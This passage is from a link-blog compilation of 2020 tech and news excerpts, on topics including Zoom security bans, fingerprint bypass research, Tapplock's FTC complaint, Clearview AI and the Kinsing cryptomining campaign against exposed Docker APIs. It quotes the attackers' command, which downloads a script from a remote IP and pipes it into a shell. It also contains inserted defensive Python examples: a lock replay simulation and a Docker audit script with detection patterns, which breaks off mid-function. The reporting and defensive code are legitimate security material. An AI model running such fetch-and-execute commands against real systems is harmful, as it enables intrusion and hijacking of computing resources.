The Linkielist

Linking ideas with the world

Cannonball Record Broken During Coronavirus – 26 Hours 38 Minutes

Only a few months have passed since we reported that the New York-to-Los Angeles Cannonball record was broken. It’s allegedly been broken again. The 26 hour, 38 minute time—which beats the record set in November by more than 45 minutes—appears to be legitimate, according to Ed Bolian, a Cannonball insider and driver who set his own 28 hour, 50 minute record in 2013. Alex Roy, who set the first modern NYC-to-LA record in 2006, also said the new claim is credible based on his analysis of multiple sources.

“It was not me,” Bolian was quick to point out to Road & Track, eager to quell an Internet-generated rumor that perhaps he had been the one to pull it off.

All we know about this new set of scofflaws is that there were three, maybe four of them, and that they were driving a white 2019 Audi A8 sedan with a pair of red plastic marine fuel tanks ratchet-strapped into its trunk. They started at the Red Ball Garage in New York City at 11:15 pm on April 4, and ended less than 27 hours later at the Portofino Hotel & Marina in Redondo Beach, California, the traditional start and end points of a Cannonball attempt.

We also know that their timing was awful. It doesn’t seem likely that the new record-holders were keen to have news reach the public so soon, especially at a time when so many people are understandably on edge. But an exuberant friend posted a picture of the Audi on Facebook this week—situated among a number of other high-dollar cars, with its trunk open to show the auxiliary fuel tanks—along with the team’s alleged time. Within a day, hundreds of people had shared the post, and social media chat groups were abuzz with Cannonball aficionados offering up opinions on the matter.

Source: Cannonball Record Broken During Coronavirus – 26 Hours 38 Minutes

There’s some whining about it being in poor taste or something. Whatever.

The US Senate reportedly advised members to stop using Zoom

US senators have been advised not to use videoconferencing platform Zoom over security concerns, the Financial Times reports.

According to three people briefed on the matter, the Senate sergeant-at-arms – whose job it is to run law enforcement and security on the Capitol – told senators to find alternative methods for remote working, although he did not implement an outright ban.

With the coronavirus outbreak forcing millions to work from home, Zoom has seen a 1,900% increase in use between December and March to 200 million daily users. This has been accompanied by a string of bad press about its security and privacy practices, to the point where CEO Eric Yuan was forced to publicly apologize last week.

This week the company admitted to “mistakenly” routing data through China in a bid to secure more server space to deal with skyrocketing demand. “We failed to fully implement our usual geo-fencing best practices. As a result, it is possible certain meetings were allowed to connect to systems in China, where they should not have been able to connect,” Yuan said.

The news sparked outrage among some senators, and Senate Democrat Richard Blumenthal called for the FTC to launch an investigation into the company.

“As Zoom becomes embedded in Americans’ daily lives, we urgently need a full & transparent investigation of its privacy and security,” the senator tweeted.

The slew of privacy issues has also prompted the Taiwanese government to ban its officials from using Zoom, and Google banned use of the app on work computers due to its “security vulnerabilities.”

While the Senate has told its members to stay away from Zoom, the Pentagon told the FT that it would continue to allow its staff to use the platform. A memo sent to top cybersecurity officials from the Department of Homeland Security said that the company was being responsive when questioned about concerns over the security of its software, Reuters reported.

Source: The US Senate reportedly advised members to stop using Zoom

Singapore stops teachers using Zoom app after ‘very serious incidents’ (Zoom bombing)

Singapore has suspended the use of video-conferencing tool Zoom by teachers after “very serious incidents” in the first week of a coronavirus lockdown that has seen schools move to home-based learning.

One incident involved obscene images appearing on screens and strange men making lewd comments during the streaming of a geography lesson with teenage girls, media said.

Zoom Video Communications Inc (ZM.O) has faced safety and privacy concerns over its conferencing app, use of which has surged in offices and schools worldwide after they shut to try and curb virus infections.

“These are very serious incidents,” Aaron Loh of the education ministry’s technology division said on Friday, without giving details.

“The Ministry of Education (MOE) is currently investigating both breaches and will lodge a police report if warranted.

“As a precautionary measure, our teachers will suspend their use of Zoom until these security issues are ironed out.”

Loh said the ministry would further advise teachers on security protocols, such as requiring secure log-ins and not sharing the meeting link beyond the students in the class.

Source: Singapore stops teachers using Zoom app after ‘very serious incidents’ – Reuters

After 50 Years of Effort, Researchers Made Silicon Emit Light, could improve computer speeds vastly

Modern transistors, which function as a computer’s brain cells, are only a few atoms long. If they are packed too tightly, that can cause all sorts of problems: electron traffic jams, overheating, and strange quantum effects. One solution is to replace some electronic circuits with optical connections that use photons instead of electrons to carry data around a chip. There’s just one problem: Silicon, the main material in computer chips, is terrible at emitting light.

Now, a team of European researchers says they have finally overcome this hurdle. On Wednesday, a research team led by Erik Bakkers, a physicist at Eindhoven University of Technology in the Netherlands, published a paper in Nature that details how they grew silicon alloy nanowires that can emit light. It’s a problem that physicists have grappled with for decades, but Bakkers says his lab is already using the technique to develop a tiny silicon laser that can be built into computer chips. Integrating photonic circuits on conventional electronic chips would enable faster data transfer and lower energy consumption without raising the chip’s temperature, which could make it particularly useful for data-intensive applications like machine learning.

“It’s a big breakthrough that they were able to demonstrate light emission from nanowires made of a silicon mixture, because these materials are compatible with the fabrication processes used in the computer chip industry,” says Pascal Del’Haye, who leads the microphotonics group at the Max Planck Institute for the Science of Light and was not involved in the research. “In the future, this might enable the production of microchips that combine both optical and electronic circuits.”

Source: After 50 Years of Effort, Researchers Made Silicon Emit Light | WIRED

Stanislascollege Pijnacker also stops using Zoom because of ‘images that are unacceptable’: porn and a Hitler moustache during German class

PIJNACKER – The Stanislascollege in Pijnacker is stopping with immediate effect its use of the video app Zoom for giving online lessons. The school has received multiple reports from pupils, parents and teachers that images or texts that are unacceptable have been shown during lessons.

On Wednesday the Erasmus College in Zoetermeer also decided to stop using Zoom immediately, after pupils were shown pornographic images during an online lesson. The Stanislascollege comprises six schools, spread across Delft, Pijnacker and Rijswijk.

‘In most cases the images or texts appear to have been shown by persons who are not connected to the school and who gained unauthorised access to the lesson,’ the school writes in a letter to parents.

Hitler moustache during German class

According to regional director Fons Loogman of Stichting Lucas Onderwijs, which the Stanislascollege falls under, there have been minor incidents. ‘Pupils forward an invitation link to third parties, who can then also watch the lesson, and you have no control over that. For example, during a German lesson a Hitler salute or a Hitler moustache was shown somewhere.’

The incident with pornographic images in Zoetermeer was, however, what tipped the balance for the school in Pijnacker to stop using Zoom. ‘In addition, over the past week we had already been alerted to reports from the IT world that Zoom is not secure. For instance, they collect information, there are insecure security structures and it is easy to hack,’ says Loogman.

Source: Stanislascollege Pijnacker also stops using Zoom because of ‘images that are unacceptable’ – Omroep West

Porn during online lesson at Zoetermeer school, so stopping with Zoom

ZOETERMEER – Pupils in a class at the Erasmus College in Zoetermeer were shown pornographic images on Wednesday morning during a lesson via the video app Zoom. The school has immediately stopped using Zoom.

‘We understand that you are extremely shocked,’ the school writes in an email to the pupils concerned. ‘Of course we have immediately stopped all Zoom lessons and are going to look at another method for teaching at home.’

Director Roderik Rot confirms that pornographic images were shown and that all lessons were stopped for that reason. ‘Yes, there was one class where that briefly happened.’ Rot cannot say how many pupils were involved: ‘A class never consists of more than thirty pupils, and with these online lessons it is usually the case that not all pupils are present.’ Asked which lesson it was, he declines to say for privacy reasons. The school offered pupils the option of contacting a support team if they wished, but as far as is known nobody has made use of it.

Stopped with online lessons

The Erasmus College has thus now stopped using Zoom immediately. According to Rot, the school had already set this in motion. An external privacy adviser had already said that Zoom could be used under strict conditions, but that he nevertheless recommended other programs. ‘So yesterday we informed all the parents that we are going to switch to something else. And that we are busy with that.’

[…]

IDs shared insecurely

According to the Delft cybersecurity company Fox-IT, it is unlikely that Zoom itself has been hacked. Security expert Sanne Maasakkers: ‘Zoom is a very large software company where many people work on security every day.’ According to Maasakkers it is more plausible that invitation codes ended up in the hands of people who were not invited to the meeting.

Every participant receives such an ID. If it is not protected with a password, outsiders can break into a Zoom meeting, which is much harder with a password, unless a participant has themselves been hacked.

Source: Porn during online lesson at Zoetermeer school: ‘Unlikely that Zoom was hacked’ – Omroep West

No, it hasn’t really been ‘hacked’ in the sense that its security is so bad that you can just enter an ID and send random porn to it.

Trump signs executive order to support moon mining, tap asteroid resources

The water ice and other lunar resources that will help the United States establish a long-term human presence on the moon are there for the taking, the White House believes.

President Donald Trump signed an executive order today (April 6) establishing U.S. policy on the exploitation of off-Earth resources. That policy stresses that the current regulatory regime — notably, the 1967 Outer Space Treaty — allows the use of such resources.

This view has long held sway in U.S. government circles. For example, the United States, like the other major spacefaring nations, has not signed the 1979 Moon Treaty, which stipulates that non-scientific use of space resources be governed by an international regulatory framework. And in 2015, Congress passed a law explicitly allowing American companies and citizens to use moon and asteroid resources.

The new executive order makes things even more official, stressing that the United States does not view space as a “global commons” and sees a clear path to off-Earth mining, without the need for further international treaty-level agreements.

The executive order, called “Encouraging International Support for the Recovery and Use of Space Resources,” has been in the works for about a year, a senior administration official said during a teleconference with reporters today. The order was prompted, at least in part, by a desire to clarify the United States’ position as it negotiates with international partners to help advance NASA’s Artemis program for crewed lunar exploration, the official added. (Engagement with international partners remains important, the official said.)

Artemis aims to land two astronauts on the moon in 2024 and to establish a sustainable human presence on and around Earth’s nearest neighbor by 2028. Lunar resources, especially the water ice thought to be plentiful on the permanently shadowed floors of polar craters, are key to Artemis’ grand ambitions, NASA officials have said.

The moon is not the final destination for these ambitions, by the way. Artemis is designed to help NASA and its partners learn how to support astronauts in deep space for long stretches, lessons that will be key to putting boots on Mars, which NASA wants to do in the 2030s.

“As America prepares to return humans to the moon and journey on to Mars, this executive order establishes U.S. policy toward the recovery and use of space resources, such as water and certain minerals, in order to encourage the commercial development of space,” Scott Pace, deputy assistant to the president and executive secretary of the U.S. National Space Council, said in a statement today.

President Trump has shown considerable interest in shaping U.S. space policy. In December 2017, for example, he signed Space Policy Directive-1, which laid the groundwork for the Artemis campaign. Two other directives have aimed to streamline commercial space regulation and the protocols for space traffic control. And Space Policy Directive-4, which the president signed in February 2019, called for the creation of the Space Force, the first new U.S. military branch since the Air Force was stood up in 1947.

Source: Trump signs executive order to support moon mining, tap asteroid resources | Space

Attackers can bypass fingerprint authentication with an ~80% success rate

For decades, the use of fingerprints to authenticate users to computers, networks, and restricted areas was (with a few notable exceptions) mostly limited to large and well-resourced organizations that used specialized and expensive equipment. That all changed in 2013 when Apple introduced TouchID. Within a few years, fingerprint-based validation became available to the masses as computer, phone, and lock manufacturers added sensors that gave users an alternative to passwords when unlocking the devices.

Although hackers managed to defeat TouchID with a fake fingerprint less than 48 hours after the technology was rolled out in the iPhone 5S, fingerprint-based authentication over the past few years has become much harder to defeat. Today, fingerprints are widely accepted as a safe alternative over passwords when unlocking devices in many, but not all, contexts.

A very high probability

A study published on Wednesday by Cisco’s Talos security group makes clear that the alternative isn’t suitable for everyone—namely those who may be targeted by nation-sponsored hackers or other skilled, well-financed, and determined attack groups. The researchers spent about $2,000 over several months testing fingerprint authentication offered by Apple, Microsoft, Samsung, Huawei, and three lock makers. The result: on average, fake fingerprints were able to bypass sensors at least once roughly 80 percent of the time.

The percentages are based on 20 attempts for each device with the best fake fingerprint the researchers were able to create. While Apple products limit users to five attempts before asking for the PIN or password, the researchers subjected the devices to 20 attempts (that is, multiple groups of one or more attempts). Of the 20 attempts, 17 were successful. Other products tested permitted significantly more or even an unlimited number of unsuccessful tries.

Tuesday’s report was quick to point out that the results required several months of painstaking work, with more than 50 fingerprint molds created before getting one to work. The study also noted that the demands of the attack—which involved obtaining a clean image of a target’s fingerprint and then getting physical access to the target’s device—meant that only the most determined and capable adversaries would succeed.

“Even so, this level of success rate means that we have a very high probability of unlocking any of the tested devices before it falls back into the PIN unlocking,” Talos researchers Paul Rascagneres and Vitor Ventura wrote. “The results show fingerprints are good enough to protect the average person’s privacy if they lose their phone. However, a person that is likely to be targeted by a well-funded and motivated actor should not use fingerprint authentication.”

Source: Attackers can bypass fingerprint authentication with an ~80% success rate | Ars Technica

Google Bans Zoom Videoconferencing Software From Employees’ Computers

Google has banned the popular videoconferencing software Zoom from its employees’ devices, BuzzFeed News has learned. Zoom, a competitor to Google’s own Meet app, has seen an explosion of people using it to work and socialize from home and has become a cultural touchstone during the coronavirus pandemic.

Last week, Google sent an email to employees whose work laptops had the Zoom app installed that cited its “security vulnerabilities” and warned that the videoconferencing software on employee laptops would stop working starting this week.

“We have long had a policy of not allowing employees to use unapproved apps for work that are outside of our corporate network,” Jose Castaneda, a Google spokesperson, told BuzzFeed News. “Recently, our security team informed employees using Zoom Desktop Client that it will no longer run on corporate computers as it does not meet our security standards for apps used by our employees. Employees who have been using Zoom to stay in touch with family and friends can continue to do so through a web browser or via mobile.”

Source: Google Bans Zoom Videoconferencing Software From Employees’ Computers

Germany Flies in Seasonal Farm Workers Amid COVID-19 Efforts – yeah I thought they wanted to keep out the immigrants or something?

Two planeloads of Eastern European farmhands arrived Thursday in Berlin and Duesseldorf amid strict precautions to protect the country from the new coronavirus, as an ambitious German program to import thousands of seasonal agricultural workers got underway.

Seasonal workers had been caught up in the country’s ban on travel after the outbreak of the coronavirus. That left a massive deficit in personnel available to pick asparagus, which has already sprouted, and plant other crops in German fields, where some 300,000 such workers were employed last year.

Most came from Eastern European countries such as Romania, Bulgaria, Ukraine, and Hungary, where wages are much lower than in Germany, which is Europe’s largest economy.

Under the new program, workers need to fly to the country in controlled groups — to prevent the possible infection of others en route — and are subject to medical checks upon arrival. They then must live and work separately from other farmhands for two weeks, and wear protective gear.

Announcing the program, Agriculture Minister Julia Kloecker said it was a “pragmatic and goal-oriented solution” that would allow up to 40,000 seasonal workers into the country in April, and another 40,000 in May. She said the hope was to find an additional 20,000 over the two months among Germany’s own unemployed, students or resident asylum seekers.

“This is important and good news for our farmers,” she said. “Because the harvest doesn’t wait and you can’t delay sowing the fields.”

Ahead of time, interested workers have to register online and have their information checked by federal police. Farmers needing help register online with Eurowings, the airline contracted to bring the workers in, saying when they’re needed and where.

So far, 9,900 people had registered for April and another 4,300 for May.

Flights are then organized to bring in groups, and the first group of workers, 530 people from Romania, arrived on Thursday in Duesseldorf and Berlin, Eurowings said. Further flights were already planned to Duesseldorf, Karlsruhe, Leipzig, Nuremberg and Frankfurt.

Source: Germany Flies in Seasonal Farm Workers Amid COVID-19 Efforts | Time

Rocket Lab proves it can recover a rocket in mid-air by catching it with a helicopter

Last year, Rocket Lab announced that it would attempt to reuse the first stage of its Electron rocket. The company’s goal is to catch the stage as it falls back towards the ocean by plucking it out of mid-air with a helicopter. While that’s ambitious, a video released today shows that Rocket Lab may not be too far off. The clip shows one helicopter dropping an Electron test stage and another hooking the stage’s parachute with a grappling hook and towing it back to land.

Rocket Lab pulled off this stunt in early March. One helicopter dropped the Electron test stage over open ocean in New Zealand. A second helicopter caught it, on the first attempt, at around 5,000 feet.

Next, Rocket Lab will attempt to recover a full Electron first stage following a launch. It won’t pull that from the air but will retrieve the rocket stage after it lands in the ocean. A parachute will help slow its descent, and like previous versions, it will include instrumentation to “inform future recovery efforts.” That mission is planned for late 2020.

Of course, catching a rocket stage after an actual launch is a lot different than catching one that’s dropped neatly by a helicopter. But the feat is a key milestone, as Rocket Lab’s plans to reuse the rockets depend on this recovery method. If it’s successful, Rocket Lab will be able to lower costs, and in theory, that may lead to more launches.

Source: Rocket Lab proves it can recover a rocket in mid-air | Engadget

Easy-to-pick “smart” locks gush personal data, FTC finds

A padlock—whether it uses a combination, a key, or “smart” tech—has exactly one job: to keep your stuff safe so other people can’t get it. Tapplock, Inc., based in Canada, produces such a product. The company’s locks unlock with a fingerprint or an app connected by Bluetooth to your phone. Unfortunately, the Federal Trade Commission said, the locks are full of both digital and physical vulnerabilities that leave users’ stuff, and data, at risk.

The FTC’s complaint (PDF) against Tapplock, released Monday, basically alleges that the company misrepresented itself, because it marketed its products as secure and tested when they were neither. A product—any product—simply being kind of crappy doesn’t necessarily fall under the FTC’s purview. Saying untrue things about your product in your advertisement or privacy policy, however, will make the commission very unhappy with you indeed.

“We allege that Tapplock promised that its Internet-connected locks were secure, but in fact the company failed to even test if that claim was true,” Andrew Smith, director of the FTC’s Bureau of Consumer Protection, said in a written statement. “Tech companies should remember the basics—when you promise security, you need to deliver security.”

Tapplock’s advertisements say its flagship product, the Tapplock One, can store up to 500 user fingerprints and can be connected to an “unlimited” number of devices through the app—a design optimized for something many people need to be able to access and for which handing off a physical key is impractical. To make the $99 lock work, Tapplock collects a great deal of personal information on its users, including usernames, email addresses, profile photos, location history, and the precise location of a user’s lock.

[…]

The lock may be built with “7mm reinforced stainless steel shackles, strengthened by double-layered lock design with anti-shim and anti-pry technologies,” as Tapplock’s website promises, but according to the FTC, perhaps it should have considered anti-screwdriver technologies. As it turns out, a researcher was able to unlock the lock “within a matter of seconds” by unscrewing the back panel. Oops.

The complaint also pointed to several “reasonably foreseeable” software vulnerabilities that the FTC alleges Tapplock could have avoided if the company “had implemented simple, low-cost steps.”

One vulnerability security researchers identified allowed a user to bypass the account authentication process entirely in order to gain full access to the account of literally any Tapplock user, including their personal information. And how could this happen? “A researcher who logged in with a valid user credential could then access another user’s account without being re-directed back to the login page, thereby allowing the researcher to circumvent Respondent’s authentication procedures altogether,” the complaint explains.

A second vulnerability allowed researchers the ability to access and unlock any lock they could get close enough to with a working Bluetooth connection. That’s because Tapplock “failed to encrypt the Bluetooth communication between the lock and the app,” leaving the data wide open for the researchers to discover and replicate.

The third vulnerability outlined in the complaint also has to do with a failure to secure communication data. That app that allows “unlimited” connections? The primary owner can of course add and revoke authorized users from the lock. But someone whose access was revoked could still access the lock because the vulnerability allowed for sniffing out the relevant data packets.
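The second and third vulnerabilities above (an unencrypted Bluetooth exchange that can be captured and replicated, and revocation that the lock itself never learns about) come from the same design choice: the unlock message carries nothing fresh and the lock keeps no authorization state. The simulation below is an added example, not Tapplock’s code or anything from the FTC complaint; the frame format, user names and keys are constructed for illustration, and the hardened variant uses a generic nonce-plus-HMAC challenge-response with revocation pushed to the lock, which is one standard remedy rather than a description of what Tapplock later shipped.

```python
import hashlib
import hmac
import secrets


class StaticCommandLock:
    """Weak design (constructed for illustration): the app sends the same
    plaintext unlock frame every time. Nothing in the frame is fresh or
    secret, so a frame recorded off the air works again later, and the
    lock holds no revocation state (revocation lives only in the app)."""

    def __init__(self):
        self.authorized = set()

    def authorize(self, user: str) -> None:
        self.authorized.add(user)

    def unlock(self, frame: bytes) -> bool:
        cmd, _, user = frame.partition(b":")
        return cmd == b"UNLOCK" and user.decode() in self.authorized


class ChallengeResponseLock:
    """Hardened design: per-user key, single-use random nonce, and a
    revocation list enforced on the lock itself rather than in the app."""

    def __init__(self):
        self.keys = {}        # user -> secret provisioned when the owner grants access
        self.revoked = set()  # revocations pushed to the lock, not just to the app
        self._pending = {}    # outstanding nonces, each valid for exactly one response

    def authorize(self, user: str, key: bytes) -> None:
        self.keys[user] = key

    def revoke(self, user: str) -> None:
        self.revoked.add(user)

    def challenge(self, user: str) -> bytes:
        nonce = secrets.token_bytes(16)
        self._pending[nonce] = user
        return nonce

    def unlock(self, user: str, nonce: bytes, response: bytes) -> bool:
        if self._pending.pop(nonce, None) != user:
            return False  # unknown, already-consumed, or someone else's nonce
        if user in self.revoked or user not in self.keys:
            return False  # the lock checks revocation, not only the app
        expected = hmac.new(self.keys[user], nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


def app_response(key: bytes, nonce: bytes) -> bytes:
    """What a legitimate app computes for a challenge: HMAC-SHA256 over the nonce."""
    return hmac.new(key, nonce, hashlib.sha256).digest()


def run_scenarios() -> dict:
    """Runs the same three events (legitimate unlock, replay of a recorded
    exchange, unlock after revocation) against both designs."""
    results = {}

    # --- weak lock ---
    weak = StaticCommandLock()
    weak.authorize("bob")
    frame = b"UNLOCK:bob"                    # constructed sample frame
    results["weak_legit"] = weak.unlock(frame)
    recorded = bytes(frame)                   # a bystander recorded the frame
    results["weak_replay"] = weak.unlock(recorded)
    app_authorized = {"bob"}
    app_authorized.discard("bob")             # owner revokes bob in the app only;
    results["weak_after_app_revoke"] = weak.unlock(recorded)  # nothing reached the lock

    # --- hardened lock ---
    strong = ChallengeResponseLock()
    bob_key = secrets.token_bytes(32)
    strong.authorize("bob", bob_key)
    n1 = strong.challenge("bob")
    r1 = app_response(bob_key, n1)
    results["strong_legit"] = strong.unlock("bob", n1, r1)
    results["strong_replay"] = strong.unlock("bob", n1, r1)  # same nonce and response again
    strong.revoke("bob")
    n2 = strong.challenge("bob")
    results["strong_after_revoke"] = strong.unlock("bob", n2, app_response(bob_key, n2))
    return results


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name}: {outcome}")
```

Running it shows the weak lock accepting the recorded frame both before and after the owner revokes the user, while the hardened lock accepts only the first response to each nonce and refuses a revoked user even when that user still holds a valid key. Encrypting the link on its own would not fix the third problem; the revocation list has to reach the device that makes the decision.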

How’d this happen?

And how did Tapplock fail to discover any of these weaknesses? Because the company did not have a security program prior to the third-party researchers’ discoveries, the FTC alleges.

Source: Easy-to-pick “smart” locks gush personal data, FTC finds | Ars Technica

Zoom banned by Taiwan’s government over China security fears

Zoom has been banned from government business in Taiwan in the latest setback for the hugely popular video-calling app.

It follows revelations that some Zoom traffic was “mistakenly” routed through China, which does not recognise Taiwan’s independence.

Taiwan’s government said public bodies should not use products with security concerns “such as Zoom”.

But competitors like Google and Microsoft were acceptable, it said.

China considers Taiwan a breakaway rebel province, destined to be reunited with the mainland.

Last week, researchers discovered that some traffic from the video-calling app was being sent through Beijing – even when all participants on the Zoom call were in North America.

The team from University of Toronto’s Citizen Lab also highlighted that Zoom has several hundred employees in mainland China, which “could also open up Zoom to pressure from Chinese authorities”.

Zoom said the traffic was “mistakenly” routed through Beijing, and apologised.

Despite the response from Zoom, Taiwan has told its public institutions to use other software.

Where possible, domestic solutions should be used, it said, adding that in special circumstances, Google or Microsoft’s apps were acceptable. Those firms operate the Duo and Skype services respectively.

It is the latest blow to Zoom, which has exploded in popularity during the coronavirus pandemic, resulting in increased scrutiny.

Source: Zoom banned by Taiwan’s government over China security fears – BBC News

Creepy Face Recognition Firm Clearview AI Sure Has a Lot of Ties to the Far Right – the extremist kinds of far right

Clearview AI, the dystopian face recognition company that claims to have amassed a database of billions of photos, signed contracts with hundreds of law enforcement agencies, and shopped its app around to the rich and powerful, has extensive links to the far right, according to a Huffington Post investigation. In fact, one of its associates claimed to have been working on a face recognition product explicitly designed to be useful for mass deportations.

Founder Hoan Ton-That has links to the far-right movement that move right past suspicious into obvious, according to HuffPo. He reportedly attended a 2016 dinner with white supremacist Richard Spencer and organized by alt-right financier Jeff Giesea, an associate of Palantir founder and Trump-supporting billionaire Peter Thiel. (Thiel secretly bankrolled a lawsuit that bankrupted Gizmodo’s former parent company, Gawker Media.) Ton-That was also a member of a Slack channel run by professional troll Chuck Johnson for his now-defunct WeSearchr, a crowdfunding platform primarily used by white supremacists; that channel included people like the webmaster of neo-Nazi site Daily Stormer, Andrew Auernheimer, and conspiracy theorist Mike Cernovich.

Per HuffPo, in January 2017 Johnson posted on Facebook that he was working on “building algorithms to ID all the illegal immigrants for the deportation squads.” Another source told HuffPo that they had seen him bragging about that work to “a whole bunch of really important people” at Trump’s DC hotel that spring, introducing them to a man the source identified as almost certainly being Ton-That.

Johnson, who was involved with Trump’s transition team, also hit up then-Breitbart employee Katie McHugh, who at that time was a white supremacist but has since left the movement. McHugh told HuffPo that Johnson asked to be put in contact with ghoulish Trump adviser Stephen Miller so he could tout a “way to identify every illegal alien in the country.” (It’s unclear whether that happened, but Clearview’s clients include Immigration and Customs Enforcement and the FBI.) That same year, Thiel invested $200,000 in Clearview.

Smartcheckr’s labor pool also included many ethnonationalists who believe in purging the U.S. of nonwhites, according to HuffPo. One of those was hardcore racist and Johnson associate Tyler Bass, who described himself as an “investigator” doing “remote software testing” for the app and whose LinkedIn posts suggest may have had access to law enforcement data associated with criminal investigations as late as 2018. Bass also claimed to McHugh to have been in attendance at a disastrous far-right rally in Charlottesville, Virginia in 2017, where a neo-Nazi terror attack killed protester Heather Heyer and wounded scores of others.

Another was Douglass Mackey, the overseer of a vast online racist propaganda operation under the moniker “Ricky Vaughn,” who had a role as a contract consultant for Smartcheckr. While there, he touted the use of its face recognition tools to anti-Semitic congressional candidate Paul Nehlen for extreme campaign opposition research. (Ton-That told HuffPo that Mackey was only a contractor for three weeks and his offer to Nehlen was unauthorized, though Smartcheckr employees took steps to distance themselves from Mackey after he was outed as “Ricky Vaughn” in 2018.)

There was also Marko Jukic, HuffPo wrote, a Clearview AI employee who marketed its products to police departments and had a history as a prolific contributor to extremist blogs, including a post where he advocated “segregation and separation” of Jews. One of Clearview’s lawyers, Tor Ekeland, is best known for representing far-right provocateurs and racists like Auernheimer.

Johnson appears to have had access to WeSearchr until at least January 2020, when he showed a fellow passenger on a flight to Boston a powerful face recognition app on his phone, according to a BuzzFeed report. In a statement to HuffPo, Ton-That denied that Johnson was an “executive, employee, consultant” or board member of Clearview, though he didn’t clarify whether Johnson holds equity in the company. He also told the site that Clearview has severed ties with Bass and Jukic, claiming he was “shocked by and completely unaware of Marko Jukic’s online writings under a different name.” (Jukic used the same pseudonym to talk with Ton-That on Slack and email that he did in his racist blog posts, HuffPo noted.)

Ton-That also told the site that he grew up on the internet, which has “not always served me well,” adding: “There was a period when I explored a range of ideas—not out of belief in any of them, but out of a desire to search for self and place in the world. I have finally found it, and the mission to help make America a safer place. To those who have read my words in the Huffington Post article, I deeply apologize for them.”

Clearview built its face recognition database by scraping photos en masse from public social media posts, a practice that is technically legal but could expose it to significant civil liability from rights holders. While scraping is legal, Clearview’s business practices have resulted in cease-and-desists from Silicon Valley giants like Google, and may have run afoul of other laws. The state attorney general of Vermont filed a lawsuit against the company last month alleging violations of the Vermont Consumer Protection Act and a state data broker law, while the AG of New Jersey ordered all police in the state to stop using Clearview products. Canadian privacy commissioners are investigating the company; it is also facing two class action lawsuits, one of which alleges that the company violated Illinois biometrics laws.

Source: Creepy Face Recognition Firm Clearview AI Sure Has a Lot of Ties to the Far Right

If you don’t cover your Docker daemon API port you’ll have a hell of a time… because cryptocreeps are hunting for it

Some Docker installations are getting hammered by malware skiddies hoping to mine digital cash using other people’s CPU time.

Infosec outfit Aqua – no, not the Barbie Girl band – said miscreants have spotted that a decent number of Docker deployments are lazily or inadvertently exposing the daemon API port to the public internet with no protection. It’s a fairly common error that hackers have exploited in the past to mine digital coins, although lately we’re told there have been thousands of infection attempts daily via this interface, all involving a piece of Linux malware dubbed Kinsing.

“These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date,” noted researcher Gal Singer this week.

“We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor.”

If an open system is found, the attacker tells it to create and run a custom Ubuntu container that executes the following command:

/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null

The fetched d.sh script disables SELinux security protections, as well as searches out and removes any other malware or cryptomining containers already running on the infected machine. That way it won’t have to compete for CPU time. It uses crontab to ensure it stays running every minute, and a bunch of other stuff: it’s 600 lines long.

The script also downloads the Kinsing malware proper, and runs it. This software nasty tries to make contact with one of four command and control servers in Eastern Europe for any special orders to carry out on the infected system. It also runs a script, called spre.sh, that uses any SSH keys it finds to log into and spread to other machines to run its code.

“The spre.sh shell script that the malware downloads is used to laterally spread the malware across the container network,” Aqua’s Singer said.

“In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets.”

Once that is done, the mining component of the malware is finally executed.

[Figure: A diagram of the Kinsing attack process]

The Register has pinged Docker for comment on the attacks. In the meantime, Singer and Aqua recommend blocking the IP addresses linked to this outbreak. It’s also highly recommended you don’t leave the daemon API port facing the internet, and use policies and configurations to limit what systems are allowed to talk to the interface.

“Identify all cloud resources and group them by some logical structure,” said the team. “Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege. Investigate logs, mostly around user actions, look for actions you can’t account for anomalies.”
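The two things a defender most wants after reading this are a way to tell whether their own dockerd is the kind of open door the campaign walks through, and a way to spot a container that looks like the Ubuntu launcher described above. The script below is an added example, not Aqua’s or Docker’s code. It reads a daemon.json-style dict plus any dockerd command-line flags, and a list of `docker inspect`-shaped records; the daemon configs, container records and the hostname example.invalid are constructed for the example. The one real detail it reuses is the launch command quoted in the article.

```python
"""Audit Docker daemon exposure and hunt for Kinsing-style containers.

Two checks a defender can run after reading Aqua's write-up:
  1. Is dockerd listening on an unauthenticated TCP socket (e.g. tcp://0.0.0.0:2375
     with no --tlsverify)?  That is the door this campaign walks through.
  2. Does any container run a "download and pipe to a shell" command, the shape
     of the Ubuntu container the attacker launches through the API?
The daemon configs and `docker inspect` records below are constructed for this
example; nothing here is Aqua's or Docker's code.
"""
import re
from typing import Dict, List

# Shapes taken from the launch command quoted in the article: a fetch piped
# straight into a shell, a bare-IP download URL, and the tail -f /dev/null
# idiom that keeps the container alive after the payload detaches.
PIPE_TO_SHELL = re.compile(r"\b(wget|curl)\b[^|;&]*\|\s*(ba)?sh\b")
RAW_IP_URL = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/\S+")
KEEPALIVE = re.compile(r"\btail\s+-f\s+/dev/null\b")


def daemon_exposure(config: Dict, cli_args: List[str] = ()) -> List[str]:
    """Findings for a dockerd setup: daemon.json as a dict plus its CLI args.

    dockerd takes listen addresses either from "hosts" in daemon.json or from
    -H/--host on the command line; TLS client auth comes from "tlsverify" or
    --tlsverify.  A tcp:// listener without TLS verification hands root on the
    host to anyone who can reach the port.
    """
    hosts = list(config.get("hosts", []))
    args = list(cli_args)
    for i, a in enumerate(args):
        if a in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
        elif a.startswith("--host="):
            hosts.append(a.split("=", 1)[1])
    tls = bool(config.get("tlsverify")) or "--tlsverify" in args

    findings = []
    for h in hosts:
        if not h.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local-only
        addr = h[len("tcp://"):]
        bind_all = addr.startswith(("0.0.0.0", ":", "[::]"))
        if not tls:
            findings.append(f"{h}: TCP API without --tlsverify (anyone reaching it is root)")
        elif bind_all:
            findings.append(f"{h}: TLS on but bound to all interfaces; firewall it")
    return findings


def suspicious_containers(inspect_records: List[Dict]) -> List[Dict]:
    """Flag containers whose Entrypoint+Cmd match the fetch-and-execute shape."""
    hits = []
    for rec in inspect_records:
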